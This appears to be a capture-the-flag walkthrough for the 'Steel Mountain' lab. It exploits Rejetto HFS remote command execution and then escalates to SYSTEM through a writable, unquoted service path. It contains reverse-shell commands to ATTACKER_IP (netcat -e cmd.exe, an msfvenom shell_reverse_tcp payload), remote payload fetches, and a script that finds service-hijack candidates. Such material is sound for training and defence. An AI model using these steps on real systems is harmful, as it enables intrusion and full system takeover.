
Steel Mountain

Manual Exploitation

Python 2 must be used to host the static netcat binary (python2 -m SimpleHTTPServer 80).

Hosting it with Python 3 did not work in this run. The exploit script itself is also Python 2 code (it imports urllib2), so run it with python2 as well.


  • Used exploit EDB-ID: 39161 (Rejetto HttpFileServer 2.3.x remote command execution through the search parameter)
  • [1] Host the static netcat binary as nc.exe on ATTACKER_IP:80; the exploit's VBScript stage fetches http://ATTACKER_IP/nc.exe, so the port and file name are fixed by the script
  • [2] Set our machine IP and port in the script
  • [3] Start a listener on that port
  • [First execution]: the exploit writes script.vbs on the target, which downloads the static netcat binary to C:\Users\Public\nc.exe
  • [Second execution]: the exploit runs nc.exe -e cmd.exe back to our machine (on the first run the download usually has not finished by the time this stage fires)

It might be necessary to run the exploit several times before it succeeds.
STEPS

  • Modify the hard-coded values near the top of the exploit to match the attacker IP and the listener port
ip_addr = "ATTACKER_IP" #local IP address
local_port = "443" # Local Port number


SMB

  • Using impacket's Python SMB server (smbserver.py, installed as impacket-smbserver on Kali) to transfer files to the target machine. If the target refuses the SMB1 connection, add -smb2support.
attacker@machine:~$ smbserver LINUXSHARE /mnt/SMBShare

  • Copying winPEASx64 from our SMB Server to the Target Machine.
C:\Windows\Temp> copy \\ATTACKER_IP\LINUXSHARE\winPEASx64.exe winPEASx64.exe

Enumeration

  • Enumerating the machine using winPEAS
  • The AdvancedSystemCareService9 service runs as LocalSystem, has an unquoted service path and CanRestart = True
  • STEELMOUNTAIN\bill also has write permission on the binary's folder, so the service binary itself can be replaced; the classic unquoted-path trick of planting C:\Program.exe is not needed here
AdvancedSystemCareService9(Advanced SystemCare Service 9)[C:\Program Files (x86)\IObit\AdvancedSystemCare\ASCService.exe] - Auto - Stopped - No Quotes and Space detected
File Permissions: bill [WriteData/CreateFiles]
Possible DLL Hijacking in binary folder: C:\Program Files (x86)\IObit\Advanced SystemCare (bill [WriteData/CreateFiles])
  • PowerUp reports the same finding for the Advanced SystemCare Service

ServiceName : AdvancedSystemCareService9
Path : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'AdvancedSystemCareService9' -Path <HijackPath>
CanRestart : True
Name : AdvancedSystemCareService9
Check : Unquoted Service Paths
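To see exactly which files this unquoted path exposes, and why overwriting ASCService.exe is the simplest route on this box, here is an added example written for this page (not code from the page, winPEAS or PowerUp). It lists the file names CreateProcess tries before the real binary and cross-checks each one, plus the binary itself, against the writable directories the tools reported. The WRITABLE map is constructed from the winPEAS and PowerUp lines above; the function names are this example's own.

```python
#!/usr/bin/env python3
"""Added example (not from the page, winPEAS or PowerUp): given an unquoted
service ImagePath and the directories a low-privileged user can write to,
list every file that user could plant or overwrite to run as the service."""
import ntpath
from typing import Dict, List, Tuple

# Service binary and writable directories, constructed from the winPEAS and
# PowerUp output above (directory -> principal that can create files there).
IMAGE_PATH = r"C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe"
WRITABLE: Dict[str, str] = {
    "C:\\": r"BUILTIN\Users",  # PowerUp: ModifiablePath=C:\ WriteData/AddFile
    r"C:\Program Files (x86)\IObit\Advanced SystemCare": r"STEELMOUNTAIN\bill",  # winPEAS
}


def hijack_candidates(image_path: str) -> List[str]:
    """Files CreateProcess tries, in order, before reaching the real binary when
    the path is unquoted and contains spaces: each prefix ending at a space,
    with '.exe' appended. A quoted path, or one without spaces, yields nothing."""
    if image_path.startswith('"') or " " not in image_path:
        return []
    words = image_path.split(" ")
    return [" ".join(words[:i]) + ".exe" for i in range(1, len(words))]


def plantable(image_path: str, writable: Dict[str, str]) -> List[Tuple[str, str]]:
    """Pair each candidate, and finally the binary itself, with the principal
    that can write its parent directory. Matching is case-insensitive and
    ignores a trailing backslash, so 'C:\\' matches dirname('C:\\Program.exe')."""
    norm = {d.rstrip("\\").lower(): who for d, who in writable.items()}
    hits = []
    for cand in hijack_candidates(image_path) + [image_path]:
        parent = ntpath.dirname(cand).rstrip("\\").lower()
        if parent in norm:
            hits.append((cand, norm[parent]))
    return hits


if __name__ == "__main__":
    for path, who in plantable(IMAGE_PATH, WRITABLE):
        action = "overwrite" if path == IMAGE_PATH else "plant"
        print(f"{action:9} {path}  (writable by {who})")
```

On this machine the output lists C:\Program.exe and C:\Program Files.exe as plantable by any member of BUILTIN\Users, and ASCService.exe itself as overwritable by bill; the page takes the last option because it needs no guessing about which candidate the Service Control Manager resolves first.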

PAYLOAD

  • Generating the payload with msfvenom (LPORT must match the listener; because the service runs as LocalSystem, the shell will be SYSTEM)
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=PORT -f exe -o ASCService.exe

  • Once again we can transfer the payload to the target machine using the Python SMB server. Keep a copy of the original ASCService.exe first so the service can be restored afterwards.
  • It is going to ask whether to overwrite the file: Yes
C:\Program Files (x86)\IObit\Advanced SystemCare> copy \\ATTACKER_IP\LINUXSHARE\ASCService.exe ASCService.exe
Overwrite ASCService.exe? (Yes/No/All): Yes
        1 file(s) copied.

Exploitation

  • Restarting the AdvancedSystemCareService9 service will start our reverse shell (winPEAS showed it already stopped, so sc stop is harmless; sc start is what launches the payload)
C:\Program Files (x86)\IObit\Advanced SystemCare> sc stop AdvancedSystemCareService9
C:\Program Files (x86)\IObit\Advanced SystemCare> sc start AdvancedSystemCareService9

  • We can catch the reverse shell using netcat
  • Because the payload is not a real service binary, the Service Control Manager will report the start as failed (error 1053) and kill the process after its timeout; work quickly from the shell, or build the payload with -f exe-service so it survives
  • We have SYSTEM rights: NT AUTHORITY\SYSTEM
Connection from 10.10.176.77:49227
Microsoft Windows [Version 6.3.9600]

C:\Windows\system32> whoami
nt authority\system